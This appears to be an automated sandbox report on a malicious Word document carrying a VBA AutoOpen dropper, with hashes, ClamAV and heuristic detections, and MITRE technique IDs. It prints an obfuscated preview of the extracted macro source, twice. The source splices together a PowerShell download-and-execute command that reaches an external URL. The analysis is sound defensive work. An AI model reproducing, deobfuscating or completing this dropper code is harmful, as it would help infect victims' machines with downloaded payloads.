Office (OLE) malware analysis — malicious · 33b223b8e4a233d0

MALICIOUS

Office (OLE)

110.5 KB Created: 2018-02-15 19:41:00 Authoring application: Microsoft Office Word First seen: 2018-02-19

MD5: f54cbde73ee9a1cfb6e3d60d3405bf44 SHA-1: 64c8cd542b9d64f0974ec88e15b196eb3434a113 SHA-256: 33b223b8e4a233d0c7945f533037808e13289a1d813de4e376766ddef64543fb

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter

The sample is a malicious Office document containing a VBA macro with an AutoOpen function. This macro utilizes a Shell() call to execute a command, which is highly indicative of downloading and running a secondary payload. The reconstructed URL 'http://wTpa+Tpaww.Tv9+Tv9abTv9+TTpa+Tpav9pFI' is the likely source of this payload.

Heuristics 7

ClamAV: Doc.Dropper.Agent-6450781-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6450781-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://wTpa+Tpaww.Tv9+Tv9abTv9+TTpa+Tpav9pFI� In document text (OLE body)
- http://wTpa+Tpaww.Tv9+Tv9abTv9+TTpa+Tpav9pFIIn document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 28112 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	28112 bytes
SHA-256: `609406fd08f60ca7b5423c8cc03975cfec3e604b39754a97baec3fafce369ab8`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "EOTSTIwHabwwUz" Function OEKOZOftjna() On Error Resume Next wSmKRjzrzwu = (fAopwvZrl - Int(iEdsaENtur) * HCbhbHDslm / Oct(uwQNiu) - (qjnMslCYQhwsf - Sin(7155828))) pzSsT = (sYwNIXnVw - Int(oVKhb) * ZSwDLqu / Oct(pfDqVu) - (GXVDsPRlXCKoM - Sin(891869))) BDvmsG = (rqpUZZjh - Int(BdpXdUz) * EHhwo / Oct(jzHhbBBCiE) - (nMBAUTapI - Sin(337610))) QSXIjma = (CJIDFYfQ) + HJjkJKD("dlRJSVL9extTv9+TvgMc+gMc9(10000'+', 2'+'Tv9+TTpa+Tpav98213Tv9+Tv93gMc+gMc'+')Tv9+Tv9EJzWRtawtAChaJTQhTiontXttLC", 8, 77) FiXfZINGnQW = (EjLzvkzpHvzkn - Int(IfcUWN) * YvrSchIkz / Oct(dCbVJzCTpwSvJK) - (RPIXkkAETjkUjS - Sin(636141))) NoRHPXFo = (FIzVhLmziZBh - Int(FdljSKSA) * OLcwHoY / Oct(VAmHNmKoSG) - (IoLjTmNCzn - Sin(2661863))) ZGwkf = (losuot - Int(EzbFEBuJsqb) * AEpsYCbJMtmYp / Oct(sBTUrV) - (jBfjjHhYdVLYwN - Sin(649222))) ZTPzstzTlfo = (WRDNFXR) + HJjkJKD("sEKjTwpdstVpa9mTv9kzVIRCMT", 12, 7) wtszuwAEkoB = (iYaAtuoFXAAJ - Int(NrTiUKX) * nzMSzwAllf / Oct(SwnlkCWBUoSXww) - (DLqjUkWGvbN - Sin(6475596))) wuShPbVFFsF = (zoTmUEqNZFicz - Int(DqUZOW) * tovELKws / Oct(KXUcDjUjDtFWd) - (HEWbTQ - Sin(5137773))) iGdBNMjMdbw = (zKdEz - Int(iJtuVhuLH) * FWVoWURsP / Oct(nzojcbRJXJw) - (hwwuALBwKvzBVz - Sin(9038604))) jHwkaLMnJTw = (wFwQCKLovu) + HJjkJKD("RBUiSJRnJhmvwz+Tv9Tpa+Tpam/EyT'+'v9+TvTpa+Tpa9gE4Tpa+TpaTTpa+Tpav9'+'+Tv9N/?http://wTpa+Tpaww.Tv9+Tv9abTv9+TTpa+Tpav9pFI", 15, 103) QCwllRnUib = (GrTYsBnN - Int(jfdsPOKRMPZ) * tIhZHzfPIWwC / Oct(ntVsrhj) - (lMkHviIwXLaCiM - Sin(6620418))) uhOpcVZ = (zkCHzXKibhcU - Int(ZUissHwwRMQX) * kKWAjbLj / Oct(HiZzNBCjOGnIw) - (rJmElphYlkimz - Sin(2197064))) tVXqIi = (ABIEjNDTsu - Int(ukzKjLmTiquWZ) * LisoUbBqFOFfD / Oct(inptKruz) - (aATAjjkFij - Sin(1872010))) oBNkhqMWR = (lowWGoYpc) + HJjkJKD("hKbVfTv9gMc+gMcVenTv9+Tv'+'9v:Tv9+Tv9puTv9+Tv9bTTpa+Tpav9+Tv9liTv9+Tv9c + I39VWKTv9+Tpa+TpaTv9IT'+'v9+Tv939 Tv9+Tv9+Tv9+gMc+gMcTv9 XwVNgTpa+TpaMc+gMcTv9+NsCuozwJwNZGhHtGmLzcvaSAKvr", 6, 148) jwwjhQnKtK = (izNHRoB - Int(VKVIavuzzd) * VrwqTrV / Oct(MjrpjESBJHWtqW) - (XtIbiINXpNpfU - Sin(6901614))) CHwwpdSujCz = (uPwrpu - Int(UmDIukpcjU) * zazKQqnwIBbtZz / Oct(ANGwwhzu) - (WXWOdhMdV - Sin(6296514))) vOWAnE = (JLjzGEqlb - Int(tdKdjbVnVRCjY) * sUYVbpzYscHo / Oct(HqtrLSjduM) - (tFqqzPSdnuGl - Sin(6129904))) ckhnSdouZ = (EHUpqAB) + HJjkJKD("YYnLSwOfpa+TpagMc+gMc9'+'-ItemI'+'39)(X'+'wTv9'+'+Tv9VTv9+Tv9SDTv9+T'+'Tpa+Tp'+'avTpa+Tpa9C)Tpa+Tpa;Tv9+TTpa+Tpav9brTv9+Tv9eTv9+gMc+gMcTv9aTv9+Tv9k;Tpa+T'+'pa}catch{}'+'}Tv9) -c'+'rTpaTpbUqIJLJjzcrLhJaJoarGJAnMk", 9, 177) aNbjiAri = (YdKiBj - Int(EOXAf) * IJiPwIctXqbP / Oct(iIdsroonwHXqtN) - (sNCphHD - Sin(7930460))) wBiBqzw = (XdNVOAniPF - Int(saVfM) * zMBHZEuPAKomh / Oct(fSAUNbSZvUpa) - (NURrWdqKroWw - Sin(4807918))) jioliusJAVu = (GNqzwiRV - Int(aBSkZXRjS) * QhuiSRIrdoidVo / Oct(MLEVts) - (rurqDtRma - Sin(1497162))) VtAOOuULQn = (OzbZqNsLwIncVw) + HJjkJKD("kdSwwRUCnzUAluskzQ TfccIhvKYkAfXhor+Tv9asfTv9+Tv9c.lTv9+Tpa+TpagMc+gMcTv95eTv9+Tv9ToS'+'Tv9+TTpa+Tpav9tTTpa+Tpav9+Tv9rvWTv9+Tv9EivWTv9+Tv9ENgl5e(Tv9+Tv9), XwVSDC);&(I39ITv9+'+'Tv9nvoTv9+TgMc+gMcv9I3Tv9+Tv99mWAi", 36, 171) YuBzi = (LMKZFup - Int(rcOPZ) * OXZVjVAjfoFBi / Oct(zuKaQEb) - (zfuNwLn - Sin(9334291))) BazpfGtXEcK = (YRzSXWKw - Int(MihVTD) * iAwRnwV / Oct(BZuaSYos) - (VjklsbXzdJr - Sin(9273309))) XEzAZS = (bLrCSLrifZv - Int(RwckiiXmwzn) * alYYSJpd / Oct(VzjiQGdA) - (qGpEb - Sin(5742031))) rksTWsfdm = (hnrnjuwjdc) + HJjkJKD("TKQ9+TgMc+gMcv9+Tv9'+'ITv9+Tpa+TpaT'+'v939eTcHrzfhqEiXbN", 4, 41) ulOjhYQv = (tJjdWKucDKOK - Int(nWLKoZ) * hsUWXqfdCNlzZ / Oct(nSquFWsrI) - (VHEHihr - Sin(4818192))) hpNIAFYQmJ = (EDBpK - Int(fiQaqZ) * kkADUPj / Oct(wqkJA) - (mXzVWMzV - Sin(4075706))) PTrsBJfijOI = (cjoZrbQRlGWT - Int(aMbpzG) * RjJqtGR / Oct(UMRPP) - (bobKLWZ - Sin(3546629))) uzRKVTBbNZw = (kRNvAtBNbu) + HJjkJKD("DzZOkbbdI ... (truncated)

SHA-256: 609406fd08f60ca7b5423c8cc03975cfec3e604b39754a97baec3fafce369ab8

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "EOTSTIwHabwwUz"
Function OEKOZOftjna()
On Error Resume Next
wSmKRjzrzwu = (fAopwvZrl - Int(iEdsaENtur) * HCbhbHDslm / Oct(uwQNiu) - (qjnMslCYQhwsf - Sin(7155828)))
pzSsT = (sYwNIXnVw - Int(oVKhb) * ZSwDLqu / Oct(pfDqVu) - (GXVDsPRlXCKoM - Sin(891869)))
BDvmsG = (rqpUZZjh - Int(BdpXdUz) * EHhwo / Oct(jzHhbBBCiE) - (nMBAUTapI - Sin(337610)))
QSXIjma = (CJIDFYfQ) + HJjkJKD("dlRJSVL9extTv9+TvgMc+gMc9(10000'+', 2'+'Tv9+TTpa+Tpav98213Tv9+Tv93gMc+gMc'+')Tv9+Tv9EJzWRtawtAChaJTQhTiontXttLC", 8, 77)
FiXfZINGnQW = (EjLzvkzpHvzkn - Int(IfcUWN) * YvrSchIkz / Oct(dCbVJzCTpwSvJK) - (RPIXkkAETjkUjS - Sin(636141)))
NoRHPXFo = (FIzVhLmziZBh - Int(FdljSKSA) * OLcwHoY / Oct(VAmHNmKoSG) - (IoLjTmNCzn - Sin(2661863)))
ZGwkf = (losuot - Int(EzbFEBuJsqb) * AEpsYCbJMtmYp / Oct(sBTUrV) - (jBfjjHhYdVLYwN - Sin(649222)))
ZTPzstzTlfo = (WRDNFXR) + HJjkJKD("sEKjTwpdstVpa9mTv9kzVIRCMT", 12, 7)
wtszuwAEkoB = (iYaAtuoFXAAJ - Int(NrTiUKX) * nzMSzwAllf / Oct(SwnlkCWBUoSXww) - (DLqjUkWGvbN - Sin(6475596)))
wuShPbVFFsF = (zoTmUEqNZFicz - Int(DqUZOW) * tovELKws / Oct(KXUcDjUjDtFWd) - (HEWbTQ - Sin(5137773)))
iGdBNMjMdbw = (zKdEz - Int(iJtuVhuLH) * FWVoWURsP / Oct(nzojcbRJXJw) - (hwwuALBwKvzBVz - Sin(9038604)))
jHwkaLMnJTw = (wFwQCKLovu) + HJjkJKD("RBUiSJRnJhmvwz+Tv9Tpa+Tpam/EyT'+'v9+TvTpa+Tpa9gE4Tpa+TpaTTpa+Tpav9'+'+Tv9N/?http://wTpa+Tpaww.Tv9+Tv9abTv9+TTpa+Tpav9pFI", 15, 103)
QCwllRnUib = (GrTYsBnN - Int(jfdsPOKRMPZ) * tIhZHzfPIWwC / Oct(ntVsrhj) - (lMkHviIwXLaCiM - Sin(6620418)))
uhOpcVZ = (zkCHzXKibhcU - Int(ZUissHwwRMQX) * kKWAjbLj / Oct(HiZzNBCjOGnIw) - (rJmElphYlkimz - Sin(2197064)))
tVXqIi = (ABIEjNDTsu - Int(ukzKjLmTiquWZ) * LisoUbBqFOFfD / Oct(inptKruz) - (aATAjjkFij - Sin(1872010)))
oBNkhqMWR = (lowWGoYpc) + HJjkJKD("hKbVfTv9gMc+gMcVenTv9+Tv'+'9v:Tv9+Tv9puTv9+Tv9bTTpa+Tpav9+Tv9liTv9+Tv9c + I39VWKTv9+Tpa+TpaTv9IT'+'v9+Tv939 Tv9+Tv9+Tv9+gMc+gMcTv9 XwVNgTpa+TpaMc+gMcTv9+NsCuozwJwNZGhHtGmLzcvaSAKvr", 6, 148)
jwwjhQnKtK = (izNHRoB - Int(VKVIavuzzd) * VrwqTrV / Oct(MjrpjESBJHWtqW) - (XtIbiINXpNpfU - Sin(6901614)))
CHwwpdSujCz = (uPwrpu - Int(UmDIukpcjU) * zazKQqnwIBbtZz / Oct(ANGwwhzu) - (WXWOdhMdV - Sin(6296514)))
vOWAnE = (JLjzGEqlb - Int(tdKdjbVnVRCjY) * sUYVbpzYscHo / Oct(HqtrLSjduM) - (tFqqzPSdnuGl - Sin(6129904)))
ckhnSdouZ = (EHUpqAB) + HJjkJKD("YYnLSwOfpa+TpagMc+gMc9'+'-ItemI'+'39)(X'+'wTv9'+'+Tv9VTv9+Tv9SDTv9+T'+'Tpa+Tp'+'avTpa+Tpa9C)Tpa+Tpa;Tv9+TTpa+Tpav9brTv9+Tv9eTv9+gMc+gMcTv9aTv9+Tv9k;Tpa+T'+'pa}catch{}'+'}Tv9)  -c'+'rTpaTpbUqIJLJjzcrLhJaJoarGJAnMk", 9, 177)
aNbjiAri = (YdKiBj - Int(EOXAf) * IJiPwIctXqbP / Oct(iIdsroonwHXqtN) - (sNCphHD - Sin(7930460)))
wBiBqzw = (XdNVOAniPF - Int(saVfM) * zMBHZEuPAKomh / Oct(fSAUNbSZvUpa) - (NURrWdqKroWw - Sin(4807918)))
jioliusJAVu = (GNqzwiRV - Int(aBSkZXRjS) * QhuiSRIrdoidVo / Oct(MLEVts) - (rurqDtRma - Sin(1497162)))
VtAOOuULQn = (OzbZqNsLwIncVw) + HJjkJKD("kdSwwRUCnzUAluskzQ TfccIhvKYkAfXhor+Tv9asfTv9+Tv9c.lTv9+Tpa+TpagMc+gMcTv95eTv9+Tv9ToS'+'Tv9+TTpa+Tpav9tTTpa+Tpav9+Tv9rvWTv9+Tv9EivWTv9+Tv9ENgl5e(Tv9+Tv9), XwVSDC);&(I39ITv9+'+'Tv9nvoTv9+TgMc+gMcv9I3Tv9+Tv99mWAi", 36, 171)
YuBzi = (LMKZFup - Int(rcOPZ) * OXZVjVAjfoFBi / Oct(zuKaQEb) - (zfuNwLn - Sin(9334291)))
BazpfGtXEcK = (YRzSXWKw - Int(MihVTD) * iAwRnwV / Oct(BZuaSYos) - (VjklsbXzdJr - Sin(9273309)))
XEzAZS = (bLrCSLrifZv - Int(RwckiiXmwzn) * alYYSJpd / Oct(VzjiQGdA) - (qGpEb - Sin(5742031)))
rksTWsfdm = (hnrnjuwjdc) + HJjkJKD("TKQ9+TgMc+gMcv9+Tv9'+'ITv9+Tpa+TpaT'+'v939eTcHrzfhqEiXbN", 4, 41)
ulOjhYQv = (tJjdWKucDKOK - Int(nWLKoZ) * hsUWXqfdCNlzZ / Oct(nSquFWsrI) - (VHEHihr - Sin(4818192)))
hpNIAFYQmJ = (EDBpK - Int(fiQaqZ) * kkADUPj / Oct(wqkJA) - (mXzVWMzV - Sin(4075706)))
PTrsBJfijOI = (cjoZrbQRlGWT - Int(aMbpzG) * RjJqtGR / Oct(UMRPP) - (bobKLWZ - Sin(3546629)))
uzRKVTBbNZw = (kRNvAtBNbu) + HJjkJKD("DzZOkbbdI
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.